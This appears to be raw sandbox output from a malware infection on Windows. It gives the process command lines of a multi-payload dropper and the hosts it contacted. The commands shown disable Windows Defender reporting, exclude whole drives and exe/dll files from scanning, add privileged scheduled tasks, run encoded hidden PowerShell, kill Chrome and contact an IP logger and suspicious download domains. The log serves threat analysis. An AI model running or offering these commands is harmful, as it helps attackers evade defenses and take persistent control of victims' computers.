schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe
"C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe"
C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe
"C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe"
C:\Users\Admin\Pictures\Adobe Films\dOaBjSg8mYjqYth2dayxRNWl.exe
"C:\Users\Admin\Pictures\Adobe Films\dOaBjSg8mYjqYth2dayxRNWl.exe"
C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe
"C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe"
C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe
"C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe"
C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe
"C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe" -h
C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe
"C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe"
C:\Users\Admin\AppData\Local\Temp\7zSF25C.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp" /SL5="$70118,140006,56320,C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2032 -ip 2032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 624
C:\Users\Admin\Pictures\Adobe Films\tLNVEw8h3F1AhYGAczL871CL.exe
"C:\Users\Admin\Pictures\Adobe Films\tLNVEw8h3F1AhYGAczL871CL.exe"
C:\Users\Admin\AppData\Local\Temp\is-IQ2D1.tmp\5(6665____.exe
"C:\Users\Admin\AppData\Local\Temp\is-IQ2D1.tmp\5(6665____.exe" /S /UID=91
C:\Windows\system32\fondue.exe
"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe
.\Install.exe /S /site_id "525403"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2032 -ip 2032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 644
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2032 -ip 2032
C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe
"C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4900 -ip 4900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 652
C:\Users\Admin\AppData\Local\Temp\siww1049.exe
"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 600
C:\Users\Admin\AppData\Local\Temp\note6060.exe
"C:\Users\Admin\AppData\Local\Temp\note6060.exe"
C:\Users\Admin\AppData\Local\Temp\1.exe
"C:\Users\Admin\AppData\Local\Temp\1.exe"
C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe
"C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe" -h
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2032 -ip 2032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 588
C:\Users\Admin\AppData\Local\Temp\tvstream22.exe
"C:\Users\Admin\AppData\Local\Temp\tvstream22.exe"
C:\Users\Admin\AppData\Local\Temp\is-8865F.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8865F.tmp\setup.tmp" /SL5="$601DE,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\inst200.exe
"C:\Users\Admin\AppData\Local\Temp\inst200.exe"
C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe
"C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 520 -p 5112 -ip 5112
C:\Users\Public\SteamKeyGen.exe
"C:\Users\Public\SteamKeyGen.exe"
C:\Users\Admin\AppData\Local\Temp\udontsay.exe
"C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2032 -ip 2032
C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
C:\Users\Admin\AppData\Local\Temp\anytime1.exe
"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
C:\Users\Admin\AppData\Local\Temp\AB6EH.exe
"C:\Users\Admin\AppData\Local\Temp\AB6EH.exe"
C:\Users\Admin\AppData\Local\Temp\anytime3.exe
"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2516 -ip 2516
C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
C:\Users\Admin\AppData\Local\Temp\9KBMC.exe
"C:\Users\Admin\AppData\Local\Temp\9KBMC.exe"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Users\Admin\AppData\Local\Temp\9KBMC67FIDAHIDD.exe
https://iplogger.org/1nXhi7
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Users\Admin\AppData\Local\Temp\anytime2.exe
"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
C:\Users\Admin\AppData\Local\Temp\L3MMH.exe
"C:\Users\Admin\AppData\Local\Temp\L3MMH.exe"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Users\Admin\AppData\Local\Temp\9KGGD.exe
"C:\Users\Admin\AppData\Local\Temp\9KGGD.exe"
C:\Users\Admin\AppData\Local\Temp\is-SGREN.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SGREN.tmp\setup.tmp" /SL5="$701BC,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gWVLwaCWd" /SC once /ST 03:32:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2032 -ip 2032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 884
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5112 -s 708
C:\Users\Public\SteamKeyNeg.exe
"C:\Users\Public\SteamKeyNeg.exe"
C:\Users\Admin\AppData\Local\Temp\6AHD0.exe
"C:\Users\Admin\AppData\Local\Temp\6AHD0.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 1264
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gWVLwaCWd"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe
"C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Users\Admin\AppData\Local\Temp\lEDcrpdl2pCEl\Application407.exe
C:\Users\Admin\AppData\Local\Temp\lEDcrpdl2pCEl\Application407.exe
C:\Users\Admin\AppData\Local\Temp\is-V54MM.tmp\nthostwins.exe
"C:\Users\Admin\AppData\Local\Temp\is-V54MM.tmp\nthostwins.exe" 81
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDA4B.tmp.bat""
C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\ZS~h.CPL",
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\ZS~h.CPL",
C:\Windows\system32\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d "C:\ProgramData\Protection Controller v6.0.5"
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 536 -p 4976 -ip 4976
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4976 -s 2072
C:\Users\Admin\AppData\Local\Temp\Chrome6.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
C:\Users\Admin\AppData\Local\Temp\temp-working.exe
"C:\Users\Admin\AppData\Local\Temp\temp-working.exe"
C:\Users\Admin\AppData\Local\Temp\Chrome6.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
C:\Users\Admin\AppData\Local\Temp\Chrome6.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gWVLwaCWd"
C:\Windows\system32\timeout.exe
timeout 4
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bYhnlZZiGBwVWbxfjL" /SC once /ST 06:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\NgGwqggyBEjLeKfaL\wxUWNCCtxxWMNyL\yjOthBP.exe\" ZF /site_id 525403 /S" /V1 /F
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 3140 -ip 3140
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3140 -s 2232
C:\ProgramData\Protection Controller v6.0.5\3e8f3f1f.exe
"C:\ProgramData\Protection Controller v6.0.5\3e8f3f1f.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 480 -p 2212 -ip 2212
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2212 -s 2236
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 560 -p 1972 -ip 1972
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1972 -s 2240
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 472 -p 5588 -ip 5588
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5588 -s 2284
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" "--oVWJq23b"
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"
C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x26c,0x270,0x274,0x248,0x278,0x7ffc779fdec0,0x7ffc779fded0,0x7ffc779fdee0
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ff6a19c9e70,0x7ff6a19c9e80,0x7ff6a19c9e90
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --mojo-platform-channel-handle=1864 /prefetch:8
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1660 /prefetch:2
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --mojo-platform-channel-handle=2192 /prefetch:8
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2616 /prefetch:1
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2564 /prefetch:1
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\ZS~h.CPL",
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\ZS~h.CPL",
C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
"C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1652,15480708616398607635,4250913911406448746,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_1151382142" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3196 /prefetch:2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | licensing.mp.microsoft.com | udp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | storesdk.dsx.mp.microsoft.com | udp |
| FR | 2.18.109.224:443 | storesdk.dsx.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | telegram.org | udp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 212.193.30.21:80 | 212.193.30.21 | tcp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| NL | 45.144.225.57:80 | 45.144.225.57 | tcp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 212.193.30.21:80 | 212.193.30.21 | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 45.144.225.57:80 | 45.144.225.57 | tcp |
| NL | 212.193.30.21:80 | 212.193.30.21 | tcp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | buck-bucket.s3.pl-waw.scw.cloud | udp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | oneservercubo.xyz | udp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | arghakhan-bulletein.xyz | udp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | i.xyzgamei.com | udp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| PL | 151.115.10.1:80 | buck-bucket.s3.pl-waw.scw.cloud | tcp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 172.67.148.222:80 | oneservercubo.xyz | tcp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 199.188.201.89:80 | arghakhan-bulletein.xyz | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 104.21.86.228:80 | i.xyzgamei.com | tcp |
| US | 104.21.86.228:80 | i.xyzgamei.com | tcp |
| US | 104.21.86.228:80 | i.xyzgamei.com | tcp |
| US | 104.21.86.228:443 | i.xyzgamei.com | tcp |
| PL | 151.115.10.1:80 | buck-bucket.s3.pl-waw.scw.cloud | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| PL | 151.115.10.1:80 | buck-bucket.s3.pl-waw.scw.cloud | tcp |
| PL | 151.115.10.1:443 | buck-bucket.s3.pl-waw.scw.cloud | tcp |
| US | 199.188.201.89:80 | arghakhan-bulletein.xyz | tcp |
| US | 199.188.201.89:80 | arghakhan-bulletein.xyz | tcp |
| US | 199.188.201.89:443 | arghakhan-bulletein.xyz | tcp |
| US | 8.8.8.8:53 | j.xyzgamej.com | udp |
| US | 172.67.221.89:443 | j.xyzgamej.com | tcp |
